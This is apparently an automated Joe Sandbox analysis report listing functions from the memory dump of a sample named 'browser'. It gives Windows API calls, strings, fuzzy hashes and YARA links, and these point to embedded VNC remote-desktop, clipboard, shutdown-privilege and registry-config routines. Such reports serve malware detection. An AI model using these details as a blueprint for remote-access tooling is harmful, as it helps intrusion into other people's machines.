Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: State$CriticalSection$EnterLeave
String ID:
API String ID: 1138030011-0
Opcode ID: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
Instruction ID: 4310669069dd063a675a2fc7fa7354efcd687e668f02fc3ec621db6c35077515
Opcode Fuzzy Hash: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
Instruction Fuzzy Hash: AB419226A28A5282F6217B31A50437AE6B2FF81356F811434ED8E037A08F3DF885C770

Function 00007FF790C551B7 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 399COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2

Part of subcall function 00007FF790C31AE0: OpenClipboard.USER32 ref: 00007FF790C31B0B

Strings

vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: DesktopOpen$ClipboardCloseInput
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2872304593-3977938048
Opcode ID: c96e353cc41264b9558b101086f72bb72654cc8578bf969b8a62cc31f3abbd79
Instruction ID: 38d889c047c21632c38d9ecad401de3c478fd561ee1a11757a8bbf4aae3df592
Opcode Fuzzy Hash: c96e353cc41264b9558b101086f72bb72654cc8578bf969b8a62cc31f3abbd79
Instruction Fuzzy Hash: 5712A236A2C6D185EB70AB35C8587FDA7A1EF86B88F844135DA4D4B795CF28F481C720

Function 00007FF790C49260 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 83libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF790C492B8
GetVersionExA.KERNEL32 ref: 00007FF790C492CF
GetModuleHandleA.KERNEL32 ref: 00007FF790C492F8
GetProcAddress.KERNEL32 ref: 00007FF790C49308
GetSystemInfo.KERNEL32 ref: 00007FF790C4931C

Strings

kernel32.dll, xrefs: 00007FF790C492F1
GetNativeSystemInfo, xrefs: 00007FF790C492FE

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Version$AddressHandleInfoModuleProcSystem
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 335284197-192647395
Opcode ID: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
Instruction ID: d8630f22d0c942a120e0a55f5ff4e6397cd65eebab6e95ac0908c112a9df2015
Opcode Fuzzy Hash: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
Instruction Fuzzy Hash: 3831EC21A2C58286EB70AB31B4553BAF3E1FF96704FC00035E68D86B95EF6CE4558B10

Function 00007FF790C43550 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF790C43569
OpenProcessToken.ADVAPI32 ref: 00007FF790C4357C
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF790C43594
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF790C435C5
GetVersionExA.KERNEL32 ref: 00007FF790C435DC
ExitWindowsEx.USER32 ref: 00007FF790C435F1

Strings

SeShutdownPrivilege, xrefs: 00007FF790C4358B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueVersionWindows
String ID: SeShutdownPrivilege
API String ID: 337752880-3733053543
Opcode ID: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
Instruction ID: 663f6effaa627af740615ec695980ba01aacbfe8d95bad5eadc0110a24f1fe2e
Opcode Fuzzy Hash: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
Instruction Fuzzy Hash: 12113A71A28A4286E764EB30F8593AAF3B0FF84744F805035E68E46B94DF7CE049CB10

Function 00007FF790C61660 Relevance: 12.3, APIs: 8, Instructions: 292windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00007FF790C6169D
IsWindowVisible.USER32 ref: 00007FF790C616B9
GetWindowRect.USER32 ref: 00007FF790C616CA
IsWindowVisible.USER32 ref: 00007FF790C6172F
GetWindowRect.USER32 ref: 00007FF790C61744

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Window$RectVisible$Foreground
String ID:
API String ID: 2499709836-0
Opcode ID: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
Instruction ID: 6cb6f9efad4fa937dd2ef5818cc745fe70b67a989df56ea0658b94d9a7836ded
Opcode Fuzzy Hash: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
Instruction Fuzzy Hash: B8D19D36B24A928EEB24DFB9D4406EC77B6BB48B48B445139DE0E67B88DE34E441C750

Function 00007FF790CE7220 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF790CF29F7
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF790CF2A16
RtlVirtualUnwind.KERNEL32 ref: 00007FF790CF2A62
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF790CF4917), ref: 00007FF790CF2AD4
SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF790CF4917), ref: 00007FF790CF2AEC
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF790CF4917), ref: 00007FF790CF2AF9
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF790CF4917), ref: 00007FF790CF2B12
TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF790CF4917), ref: 00007FF790CF2B20

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
Instruction ID: ff48442f1502b7b807b369a460474ebc46870c00cbfe468e380c5825c3768405
Opcode Fuzzy Hash: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
Instruction Fuzzy Hash: 2631D03992CB4286E760AB74E8503A9B7B4FB85394F806135DA8E427A4DF7CF044CB20

Function 00007FF790C434B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF790C434C3
OpenProcessToken.ADVAPI32 ref: 00007FF790C434D6
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF790C434EE
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF790C4351F
ExitWindowsEx.USER32 ref: 00007FF790C4352E

Strings

SeShutdownPrivilege, xrefs: 00007FF790C434E5

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 1314775590-3733053543
Opcode ID: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
Instruction ID: a403fc1666b18fcf283b31084b541cc57f755fb83013b39eedb11cdd61a683fd
Opcode Fuzzy Hash: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
Instruction Fuzzy Hash: F9011B71A29A8281E760EB30F8552AAF3B1FF89754F906035E64E47764DE3DE049CB10

Function 00007FF790CF8C90 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

__tzset.LIBCMT ref: 00007FF790CF8DF3
_get_daylight.LIBCMT ref: 00007FF790CF8DFC
_get_daylight.LIBCMT ref: 00007FF790CF8E0D
_get_daylight.LIBCMT ref: 00007FF790CF8E1E
_isindst.LIBCMT ref: 00007FF790CF8EDA

Part of subcall function 00007FF790CF4930: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF790CF49D2), ref: 00007FF790CF4948

_errno.LIBCMT ref: 00007FF790CF8F2E

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _get_daylight$CurrentProcess__tzset_errno_isindst
String ID:
API String ID: 1870958493-0
Opcode ID: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
Instruction ID: 08eae58d7d1a4cbdc553c233dea40b286fc3318ed392d45935da2514c18e8a6d
Opcode Fuzzy Hash: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
Instruction Fuzzy Hash: BE714933F241024FE738AB349A626FCA696AF52348F948135DF0996BD9DF38F5058611

Function 00007FF790C613A0 Relevance: 9.0, APIs: 6, Instructions: 42clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF790C613B0
EmptyClipboard.USER32 ref: 00007FF790C613BA
GlobalAlloc.KERNEL32 ref: 00007FF790C613DF
GlobalLock.KERNEL32 ref: 00007FF790C613F0
GlobalUnlock.KERNEL32 ref: 00007FF790C61411
SetClipboardData.USER32 ref: 00007FF790C6141F

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ClipboardGlobal$AllocDataEmptyLockOpenUnlock
String ID:
API String ID: 2715784024-0
Opcode ID: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
Instruction ID: b53d80a3805e497c562fa6ab10cebf0bca9d28c96e7e3c528c2184d3b6dc15fd
Opcode Fuzzy Hash: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
Instruction Fuzzy Hash: A0018015A3CA4282FA346B3568182B9E2F5BF46BE5F482134DD2E477D4DE2CF444C220

Function 00007FF790C87BD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C3D390: GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87C09

Part of subcall function 00007FF790C87650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87689
Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C876DD
Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C87722

Part of subcall function 00007FF790C878E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C8792E
Part of subcall function 00007FF790C878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C8796A
Part of subcall function 00007FF790C878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C879B2

Strings

UseRegistry, xrefs: 00007FF790C87BF8
group1, xrefs: 00007FF790C87C2C, 00007FF790C87C63
admin, xrefs: 00007FF790C87BFF

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: PrivateProfile$CreateQueryValue$FileModuleName
String ID: UseRegistry$admin$group1
API String ID: 1728753321-252764636
Opcode ID: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
Instruction ID: e81d16cec07ae53bd9f50dba4053d6b1f61e1392b1f9da8e5615eb97576c718f
Opcode Fuzzy Hash: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
Instruction Fuzzy Hash: CC11FE21A3858281EA70FB30F4913E9A361FF99744FC01135DA4D46BA6DE3CF554C620

Function 00007FF790C87C90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C3D390: GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87CC9

Part of subcall function 00007FF790C87650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87689
Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C876DD
Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C87722

Part of subcall function 00007FF790C878E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C8792E
Part of subcall function 00007FF790C878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C8796A
Part of subcall function 00007FF790C878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C879B2

Strings

group2, xrefs: 00007FF790C87CEC, 00007FF790C87D23
UseRegistry, xrefs: 00007FF790C87CB8
admin, xrefs: 00007FF790C87CBF

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: PrivateProfile$CreateQueryValue$FileModuleName
String ID: UseRegistry$admin$group2
API String ID: 1728753321-2518265958
Opcode ID: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
Instruction ID: adaea2a3f8eeb54bde2bf8bba2c0f5f22e8d982a4ad5550062f206716df7f5ba
Opcode Fuzzy Hash: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
Instruction Fuzzy Hash: E011FA32A2858281EA70FB30E4613F9A360FF8A744FC01135DA4D467A6DE3CF555CA20

Function 00007FF790C87D50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C3D390: GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87D89

Part of subcall function 00007FF790C87650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87689
Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C876DD
Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C87722

Part of subcall function 00007FF790C878E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C8792E
Part of subcall function 00007FF790C878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C8796A
Part of subcall function 00007FF790C878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C879B2

Strings

group3, xrefs: 00007FF790C87DAC, 00007FF790C87DE3
UseRegistry, xrefs: 00007FF790C87D78
admin, xrefs: 00007FF790C87D7F

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: PrivateProfile$CreateQueryValue$FileModuleName
String ID: UseRegistry$admin$group3
API String ID: 1728753321-3776872688
Opcode ID: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
